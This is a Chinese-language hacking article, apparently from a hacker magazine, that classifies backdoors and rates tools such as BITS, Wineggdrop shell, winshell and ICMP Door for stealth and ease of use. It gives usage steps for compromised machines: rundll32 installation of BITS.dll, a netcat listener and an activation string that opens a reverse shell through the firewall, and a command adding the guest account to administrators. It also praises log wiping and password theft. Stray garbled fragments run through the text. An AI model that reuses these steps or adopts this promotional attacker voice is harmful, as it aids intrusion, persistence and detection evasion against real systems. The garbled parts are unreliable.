後門可以按照很多方式來分類,標準不同自然分類就不同,為了便於大家理解,我們從技術方面來考慮後門程序的分類方法: 此類後門程序壹般都是服務器上正常 的web服務來構造自己的連接方式,比如非常流行的ASP、cgi腳本後門等。
網頁後門,網絡上針對系統漏洞的攻擊事件漸漸少了,因為大家在認識到網絡安全的重要性之後,最簡單卻又最有效的防護辦法:升級,都被大家所認同,所以系統漏洞在以後的歲月中存活的周期會越來越短,而從最近的趨勢來看,腳本漏洞已經漸漸取代了系統漏洞的地位,非常多的人開始研究起腳本漏洞來,sql註入也開始成為各大安全站點首要關註熱點,找到提升權限的突破口,進而拿到服務器的系統權限。
asp、CGI、PHP這三個腳本大類在網絡上的普遍運用帶來了腳本後門在這三方面的發展。
線程插入後門
利用系統自身的某個服務或者線程,將後門程序插入到其中,具體原理原來《黑客防線》曾具體講解過,感興趣的朋友可以查閱。這也是現在最流行的壹個後門技術。
擴展後門
所謂的“擴展”,是指在功能上有大的提升,比普通的單壹功能的後門有很強的使用性,這種後門本身就相當於壹個小的安全工具包,能實現非常多的常見安全功能,適合新手使用————但是,功能越強,個人覺得反而脫離了後門“隱蔽”的初衷,具體看法就看各位使用者的喜好了。
c/s後門
和傳統的木馬程序類似的控制方法,采用“客戶端/服務端”的控制方式,通過某種特定的訪問方式來啟動後門進而控制服務器。
root kit 6o f3H 3B
這個需要單獨說明,其實把它單獨列壹個類在這裏是不太恰當的,但是,root kit的出現大大改變了後門程序的思維角度和使用理念,可以說壹個好的root kit就是壹個完全的系統殺手!後文我們講涉及到這方面,壹定不會讓大家失望!
上面是按照技術做的分類,除了這些方面,正向連接後門、反向連接後門等分類也是很常見的,其實如何分類是編程者考慮的事,廣大的使用者就不用考慮那麽多了,我們看重的,只是功能! 首先我們來簡單解釋壹下什麽是典型的線程插入後門:這種後門在運行時沒有進程,所有網絡操作均播入到其他應用程序的進程中完成。也就是說,即使受控制端安裝的防火墻擁有“應用程序訪問權限”的功能,也不能對這樣的後門進行有效的警告和攔截,也就使對方的防火墻形同虛設了!因為對它的查殺比較困難,這種後門本身的功能比較強大,是“居中家旅行、入侵攻擊”的必備品哦!
這類的典範就是國內提倡網絡***享的小榕的BITS了,從它的推出以來,各類安全工具下載園地裏BITS就高居榜首,非常多的朋友使用它的過程中感到了方便。類型:系統後門
使用範圍:wind200/xp/2003
隱蔽程序:★★★★☆
使用難度:★★★☆☆
查殺難度:★★★★☆
BITS其實是Background Intelligent Transfer Servicer的縮寫,可以在不知不覺中實現另壹種意義的典型的線程插入後門,有以下特點:進程管理器中看不到;平時沒有端口,只是在系統中充當臥底的角色;提供正向連接和反向連接兩種功能;僅適合用於windows 200/xp/2003。
運用舉例
首先我們用3389登錄上肉雞,確定妳有SYSTEM的權限,將BITS.DLL拷貝到服務器上,執行CMD命令: 4 #R Br A
rundll32.exebits.dll,install
這樣就激活了BIST,程序用這個特征的字符來辨認使用者,也就相當於妳的密碼了,然後卸載:rundll32.exe BITS.dll,Uninstall
這是最簡單的使用,這個後門除了隱蔽性好外,還有兩大特點是非常 值得借鑒的:端口復用和正反向連接。雖然很多朋友經常聽到這兩個名詞,但並不了解它們,端口復用就是利用系統正常的TCP端口通訊和控制,比如80、139等,這樣的後門有個非常 大的好處就是非常 隱蔽,不用自己開端口也不會暴露自己的訪問,因為通訊本身就是系統的正常訪問!另壹個是反向連接,這個很常 見,也是後門中壹個經典思路,因為從服務器上主動方問外邊是不被禁止的,很多很歷害的防火墻就怕這點!
BITS的正向連接很簡單,大家可以參考它的README,這種方式在服務器沒有防火墻等措施的時候很管用,可以方便地連接,但是遇到有防火墻這樣的方式就不靈了,得使用下面的反向連接方式: 70 +g3l
在本地使用NC監聽(如:nc -l -p 1234)
用NC連接目標主機的任何壹個防火墻允許的TCP端口(80/139/445……)
輸入激活命令:[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email] ^q/hQ , 4
目標主機的CMD將會出現NC監聽的端口2222,這樣就實現了繞過防火墻的功能了。 所謂的擴展後門,在普通意義上理解,可以看成是將非常多的功能集成到了後門裏,讓後門本身就可以實現很多功能,方便直接控制肉雞或者服務器,這類的後門非常受初學者的喜愛,通常集成了文件上傳/下載、系統用戶檢測、HTTP訪問、終端安裝、端口開放、啟動/停止服務等功能,本身就是個小的工具包,功能強大。
Wineggdroup shell j;類型:系統後門
使用範圍:win2000/xp/2003
隱蔽程度:★★★★☆
使用難度:★★☆☆☆
危害程度:★★★★☆
查殺難度:★★★★☆
這個後門是擴展後門中很有代表性的壹個,功能這全面讓人嘆為觀止,它能實現如下比較有特色的功能:進程管理,可查看,殺進程(支持用進程名或PID來殺進程);註冊表管現(查看,刪除,增加等功能);服務管理(停止,啟動,枚舉,配置,刪除服務等功能)端口到程序關聯功能(fport);系統重啟,關電源,註銷等功能(reboot,poweroff,shutdown,logoff);嗅探密碼功能;安裝終端,修改終端端口功能;端口重定向功能(多線程,並且可限制連接者IP);HTTP服務功能(多線程,並且可限制連接者IP);Socd5代理功能(支持兩種不同方式驗證,可限制連接者IP);克隆賬號,檢測克隆賬戶功能(clone,checkclone);加強了的FindpassWord功能(可以得到所有登錄用戶,包括使用克隆賬戶遠程登錄用戶密碼);HTTP代理(完全匿名,支持oicq、 MSN、mirc等程序);其他輔助功能,。
CleanEvent:刪除系統日誌。
Redirect:TCP數據轉發,這個功能是後門程序中非常出色的壹個功能,可以通過某壹端口的數據轉發來控制內網的機器,在滲透入侵的時候非常管用!
EnumService:列舉所有自動啟動的服務的資料,比如後門、木馬。
RegEdit:進入註冊表操作模式,熟悉註冊表的使用者終於在後門中找到了福音! !
Findpassword:得到所有登錄用戶密碼,比我們常用的findpass功能可強多了。
總體來講,Wineggdrop shell是後門程序中很出彩的壹個,它經過作者幾次大規模的修改和升級,已經趨於穩定,功能的強大當然沒得說,但是由於功能太強大,被查殺和懷疑是難以避免的,所以很多人在使用Wineggdrop shell壹段時間後就發現肉雞飛了,其實是很正常的事,我妳出不用氣餒,其實用很簡單的方法就可以很好地提高它的隱蔽性,下文將有說明。
相對於Wineggdrop shell來說,獨孤劍客的winshell在功能上就不那麽全面了,但是筆者推薦新手更多的使用winshell而不是Wineggdrop shell,因為winshell功能除了獲得壹個shell以外,只加入了壹些重啟、關閉服務器的命令,功能相對簡單,但完全使用系統自帶的cmd來執行命令,對系統學習和掌握也是非常有幫助的!
Winshell和wolf這兩者都是國內早期頂尖的後門程序,程序的編制無疑是非常經典的,新手學習時使用這兩款後門壹定能讓妳明白很多系統相關東西,了解很多入侵思路和方法。 傳統的木馬程序常常使用C/S構架,這樣的構架很方便控制,也在壹定程度上避免了“萬能密碼”的情況出現,對後門私有化有壹定的貢獻,這方面分類比較模糊,很多後門可以歸結到此類中,比如較巧妙的就是ICMP Door了
類型:系統後門
使用範圍:win2000/xp/2003 2Z6
隱蔽程度:★★★★★
使用難度:★★★☆☆
危害程度:★★★★☆
查殺難度:★★★★★
這個後門利用ICMP通道進行通信,所以不開任何端口,只是利用系統本身的ICMP包進行控制安裝成系統服務後,開機自動運行,可以穿透很多防火墻——很明顯可以看出它的最大特點:不開任何端口~只通過ICMP控制!和上面任何壹款後門程序相比,它的控制方式是很特殊的,連80端口都不用開放,不得不佩服務程序編制都在這方面獨特的思維角度和眼光!
運用舉例
這個後門其實用途最廣的地方在於突破網關後對內網計算機的控制,因為很多機密數據都是放在內網計算機上的,而控制內網計算機並不是我們想到位的商業網絡進行入侵檢測,它的網絡內部並不像我們常見的內網那樣非常容易入侵和控制,因為該公司本身涉及到壹些網絡安全的服務,所以內網個人計算機的防護是很到位的,在嘗試過很多後門後,最後ICMP Door幫我實現了成功的滲透內網!由此筆者開始愛上這個後門。
首先使用icmpsrv.exe -install參數進行後門的安裝,再使用icmpsend.exe IP進行控制,可以用:[ localgroup administrators guest /add >hkfx,然後妳又可以控制服務器了。
很明顯示,同榕哥的BITS相比,DEVIL5有壹些缺陷:不能通過系統自帶端口通訊、執行命令比較麻煩,需要每次輸入密碼而且不回顯示輸入內容,很容易出錯。但是,它有自己的優勢:插入線程可以自已定制,比如設置IE的線程為插入的目標就比較難被查殺:自己提供了專門的查殺工具DELDEVIL5.exe,幫助防護者清理系統;而且它可以任意改名和綁定,使用靈活性上比BITS強……大家選擇哪能款就看自己的喜好了。
另外,PortLess BackDoor等工具也是此類的後門,功能強大,隱蔽性稍差,大家有興趣可以自己研究壹下。 如果說上面的後門程序都各有千秋、各有所長的話,它們和經典的root kit 壹比簡直就是小巫見大巫了,那究竟什麽樣是root kit呢?
root kit出現於20世紀90年代初,在1994年2月的壹篇安全咨詢報告中首先使用了root kit這個名詞。從出現至今,root kit 的技術發展非常迅速,應用越來越廣泛,檢測難度也越來越大。其中釷對SunOS和Linux兩種操作系統的root kit最多。
很多人有壹個誤解,他們認為root kit 是用作獲得系統root訪問權限的工具。實際上,root kit是攻擊都用來隱蔽自己的蹤跡和保留root訪問權限的工具。通常,攻擊者通過遠程攻擊獲得root訪問權限,進入系統後,攻擊者會在侵入的主機中安裝root kit,然後他將經常通過root kit的後門檢查系統是否有其他的用戶登錄,如果只有自己,攻擊者就開始著手清理日誌中的有關信息。通過root kit的嗅探器獲得其他系統的用戶和密碼之後,攻擊者就會利用這些信息侵入其他系統。
從*nix系統上遷移到windows系統下的root kit完全沿襲了這些“可怕”的功能!網絡上常見的root kit 是內核級後門軟件,用戶可以通過它隱藏文件、進程、系統服、系統驅動、註冊表鍵和鍵值、打開的端口以及虛構可用磁盤窨。程序同時也在內存中偽裝它所做的改動,並且隱身地控制被隱藏進程。程序安裝隱藏後門,註冊隱藏系統服務並且安裝系統驅動。該後門技術允許植入reDirector,是非常難以查殺的壹個東東,讓很多網絡管員非常頭疼!